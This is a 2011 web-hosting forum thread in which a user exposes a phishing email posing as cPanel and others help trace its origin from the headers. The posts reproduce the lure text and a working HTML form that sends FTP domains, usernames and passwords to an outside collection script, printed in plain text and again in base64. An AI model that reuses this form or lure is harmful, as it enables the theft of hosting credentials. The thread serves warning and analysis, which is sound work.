Results 1 to 10 of 10
  1. #1
    Join Date
    Nov 2010
    Location
    /
    Posts
    234

    Exclamation cPanel Email Pishing !!

    Hi Guys,

    Yesterday i got an email from "cPanel" that was required my ftp root access.. see below.

    Dear user of the cPanel service,

    Due to system maintenance, you are required to confirm your FTP details by compiling the form attached to this email.

    Failure to do may result in host suspension .This is just a routine check from our part to make sure all our clients are active.

    We apologize for any inconvenience this may cause. Please confirm your details using the form attached.

    Please do not reply at this email. Use the contact form instead.

    Note: For your convience, please download and open the attached HTML file in a modern browser like Firefox 3, Chrome 11, Safari 4 etc.
    And it was attached a file, html file.

    For me it sound wired how can it be possible cPanel ask this kind of infomation so i donwloaded the file and opened it with a notepad and it was a pishing look below

    <form action="http://ndnguyen.net/h.php" method="post">
    <table class="login" cellpadding="0" cellspacing="0" width="200">
    <tbody><tr>
    <td align="left"><b>Login</b></td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>FTP Domain</td>
    <td><input autocomplete="on" name="domain" size="16" type="text"></td>
    </tr>
    <tr>
    <td>FTP Username</td>
    <td><input autocomplete="on" name="user" size="16" type="text"></td>
    </tr>
    <tr>
    <td>FTP Password</td>
    <td><input name="pass" size="16" type="password"></td>
    </tr>
    <tr>
    <td>Hosting Provider</td>
    <td><input autocomplete="on" name="host" size="16" type="text"></td>
    </tr>

    <tr>
    <td colspan="2" align="center"><input value="Confirm" class="input-button" type="submit"></td>
    </tr>
    </tbody></table>
    <p><strong>Incorrect information may result in the suspension or termination of the Customer's Services.</strong></p>
    </form>
    So i am opening this topic for many users to not fall in this traps ....

  2. #2
    Join Date
    Jan 2006
    Location
    United States
    Posts
    1,386
    What e-mail address did you get this from?

  3. #3
    Join Date
    Nov 2010
    Location
    /
    Posts
    234
    rom cPanel Inc. <client392429183837@cpanel.net>
    sender-time Sent at 12:33 AM (GMT+08:00). Current time there: 7:39 PM. ✆
    to support@xxx.com
    date Sun, Apr 3, 2011 at 12:33 AM
    subject cPanel License for xxx

  4. #4
    Join Date
    Mar 2009
    Posts
    3,816
    Post headers. Not the fake from address.

  5. #5
    Join Date
    Nov 2010
    Location
    /
    Posts
    234
    Quote Originally Posted by quantumphysics View Post
    Post headers. Not the fake from address.
    how do get header ?

  6. #6
    Join Date
    Mar 2009
    Posts
    3,816
    What email provider are you using/webmail interface/application?

  7. #7
    Join Date
    Nov 2010
    Location
    /
    Posts
    234
    Quote Originally Posted by quantumphysics View Post
    What email provider are you using/webmail interface/application?
    i am using Gmail !!!

  8. #8
    Join Date
    Mar 2009
    Posts
    3,816
    There's an arrow on the top right of the message next to reply - click it, then click "show original"

  9. #9
    Join Date
    Nov 2010
    Location
    /
    Posts
    234
    Quote Originally Posted by quantumphysics View Post
    There's an arrow on the top right of the message next to reply - click it, then click "show original"
    Delivered-To: xxx@gmail.com
    Received: by 10.229.78.193 with SMTP id m1cs18280qck;
    Sat, 2 Apr 2011 16:01:31 -0700 (PDT)
    Received: by 10.224.212.194 with SMTP id gt2mr4777693qab.68.1301785290324;
    Sat, 02 Apr 2011 16:01:30 -0700 (PDT)
    Received-SPF: softfail (google.com: best guess record for domain of transitioning esquire@domainhosting.domainhosting.ph does not designate 174.123.233.26 as permitted sender) client-ip=174.123.233.26;
    Received: by 10.241.193.71 with POP3 id 7mf227503qwb.15;
    Sat, 02 Apr 2011 16:01:30 -0700 (PDT)
    X-Gmail-Fetch-Info: support@xxx.com 5 mail.xxx.com 110 support@xxx.com
    Return-path: <esquire@domainhosting.domainhosting.ph>
    Envelope-to: support@xxx.com
    Delivery-date: Sun, 03 Apr 2011 00:33:55 +0200
    Received: from domainhosting.ph ([174.123.233.26] helo=domainhosting.domainhosting.ph)
    by CH1.xxx.COM with esmtps (TLSv1:AES256-SHA:256)
    (Exim 4.69)
    (envelope-from <esquire@domainhosting.domainhosting.ph>)
    id 1Q69OF-0004gt-OC
    for support@xxx.com; Sun, 03 Apr 2011 00:33:55 +0200
    Received: from esquire by domainhosting.domainhosting.ph with local (Exim 4.69)
    (envelope-from <esquire@domainhosting.domainhosting.ph>)
    id 1Q69OE-0004qu-Dn
    for support@xxx.com; Sun, 03 Apr 2011 06:33:30 +0800
    To: support@xxx.com
    Subject: cPanel License for xxx.com
    X-PHP-Script: esquireinternational.com/resources/full_screen/mail.php for 213.179.212.123
    From: cPanel Inc. <client392429183837@cpanel.net>
    Reply-To:
    MIME-Version: 1.0
    Content-Type: multipart/mixed; boundary=3DA55ABD7C27E63EBB4A4CC3F9BCDCC6
    Message-Id: <E1Q69OE-0004qu-Dn@domainhosting.domainhosting.ph>
    Date: Sun, 03 Apr 2011 06:33:30 +0800
    X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
    X-AntiAbuse: Primary Hostname - domainhosting.domainhosting.ph
    X-AntiAbuse: Original Domain - xxx.com
    X-AntiAbuse: Originator/Caller UID/GID - [588 32003] / [47 12]
    X-AntiAbuse: Sender Address Domain - domainhosting.domainhosting.ph
    X-Source: /usr/local/cpanel/cgi-sys/php5
    X-Source-Args: php5
    X-Source-Dir: esquireinternational.com:/public_html/resources/full_screen

    --3DA55ABD7C27E63EBB4A4CC3F9BCDCC6
    Content-Type: text/html
    Content-Transfer-Encoding: 8bit

    <html>
    <p><img src="http://www.24shells.net/images/logo-cpanel-whm.gif" width="98" height="68"></p>
    <p>Dear user of the cPanel service,</p>
    <p>Due to system maintenance, you are required to confirm your FTP details by compiling the form attached to this email.</p>
    <p>Failure to do may result in host suspension .This is just a routine check from our part to make sure all our clients are active.</p>
    <p>We apologize for any inconvenience this may cause. Please confirm your details using the form attached.</p>
    <p>Please do not reply at this email. Use the contact form instead.</p>
    <h5><em>Note</em>: For your convience, please download and open the attached HTML file in a modern browser like Firefox 3, Chrome 11, Safari 4 etc.</h5>
    </html>

    --3DA55ABD7C27E63EBB4A4CC3F9BCDCC6
    Content-Type: ; name="cpanel.html"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="cpanel.html"

    PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFs
    Ly9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25h
    bC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPjxoZWFk
    Pg0KDQoNCjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL2NwYW5lbC5uZXQv
    ZmF2aWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiI+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250
    ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+DQo8dGl0bGU+Y1Bh
    bmVsIDExPC90aXRsZT4NCjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cDovL2dvb2Z3
    ZWFyLmNvbS9zdHlsZS5jc3MiIHR5cGU9InRleHQvY3NzIj4NCg0KPC9oZWFkPjxib2R5Pg0KPGRp
    diBpZD0id3JhcCI+DQoJPGRpdiBpZD0idG9wIj4NCgkJDQoJPC9kaXY+DQoJPGRpdiBpZD0ibWlk
    Ij4NCgkJPGRpdiBpZD0iY29udGVudC13cmFwIiBhbGlnbj0iY2VudGVyIj4gDQoNCjxmb3JtIGFj
    dGlvbj0iaHR0cDovL25kbmd1eWVuLm5ldC9oLnBocCIgbWV0aG9kPSJwb3N0Ij4NCjx0YWJsZSBj
    bGFzcz0ibG9naW4iIGNlbGxwYWRkaW5nPSIwIiBjZWxsc3BhY2luZz0iMCIgd2lkdGg9IjIwMCI+
    DQo8dGJvZHk+PHRyPg0KPHRkIGFsaWduPSJsZWZ0Ij48Yj5Mb2dpbjwvYj48L3RkPg0KPHRkPiZu
    YnNwOzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPkZUUCBEb21haW48L3RkPg0KPHRkPjxpbnB1dCBh
    dXRvY29tcGxldGU9Im9uIiBuYW1lPSJkb21haW4iIHNpemU9IjE2IiB0eXBlPSJ0ZXh0Ij48L3Rk
    Pg0KPC90cj4NCjx0cj4NCjx0ZD5GVFAgVXNlcm5hbWU8L3RkPg0KPHRkPjxpbnB1dCBhdXRvY29t
    cGxldGU9Im9uIiBuYW1lPSJ1c2VyIiBzaXplPSIxNiIgdHlwZT0idGV4dCI+PC90ZD4NCjwvdHI+
    DQo8dHI+DQo8dGQ+RlRQIFBhc3N3b3JkPC90ZD4NCjx0ZD48aW5wdXQgbmFtZT0icGFzcyIgc2l6
    ZT0iMTYiIHR5cGU9InBhc3N3b3JkIj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD5Ib3N0aW5nIFBy
    b3ZpZGVyPC90ZD4NCjx0ZD48aW5wdXQgYXV0b2NvbXBsZXRlPSJvbiIgbmFtZT0iaG9zdCIgc2l6
    ZT0iMTYiIHR5cGU9InRleHQiPjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIg
    YWxpZ249ImNlbnRlciI+PGlucHV0IHZhbHVlPSJDb25maXJtIiBjbGFzcz0iaW5wdXQtYnV0dG9u
    IiB0eXBlPSJzdWJtaXQiPjwvdGQ+DQo8L3RyPg0KPC90Ym9keT48L3RhYmxlPg0KPHA+PHN0cm9u
    Zz5JbmNvcnJlY3QgaW5mb3JtYXRpb24gbWF5IHJlc3VsdCBpbiB0aGUgc3VzcGVuc2lvbiBvciB0
    ZXJtaW5hdGlvbiBvZiB0aGUgQ3VzdG9tZXIncyBTZXJ2aWNlcy48L3N0cm9uZz48L3A+DQo8L2Zv
    cm0+DQoNCjwvZGl2Pg0KPC9kaXY+DQo8ZGl2IGlkPSJib3QiPg0KPC9kaXY+DQpjUGFuZWwsIElu
    Yy4gMTk5Ny0yMDExDQo8L2Rpdj4NCjxwPiZuYnNwOzwvcD4NCjwvYm9keT48L2h0bWw+

    --3DA55ABD7C27E63EBB4A4CC3F9BCDCC6--
    this is the header os the message

  10. #10
    Join Date
    Mar 2009
    Posts
    3,816
    being sent from a hacked hostgator system then, 174.123.233.26 at esquireinternational.com/resources/full_screen/mail.php


    im 99% this is the same person that did this spam run because both originate from ProXPN, which is a free vpn service and it's unlikely any sane phisher would use something logged to death

Similar Threads

  1. pishing attack: site running modernbill 4 compromised
    By cuantica in forum Hosting Security and Technology
    Replies: 2
    Last Post: 11-04-2008, 10:33 AM
  2. How to detect Pishing Pages?
    By James Peter in forum Programming Discussion
    Replies: 4
    Last Post: 12-04-2007, 04:06 AM
  3. [Pishing] What's this?
    By blubb in forum Web Hosting Lounge
    Replies: 4
    Last Post: 09-19-2007, 02:16 PM
  4. The Vietname FRAUD-PISHING-SPAMMING Facts!
    By dolay in forum Web Hosting Lounge
    Replies: 0
    Last Post: 05-14-2006, 06:23 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •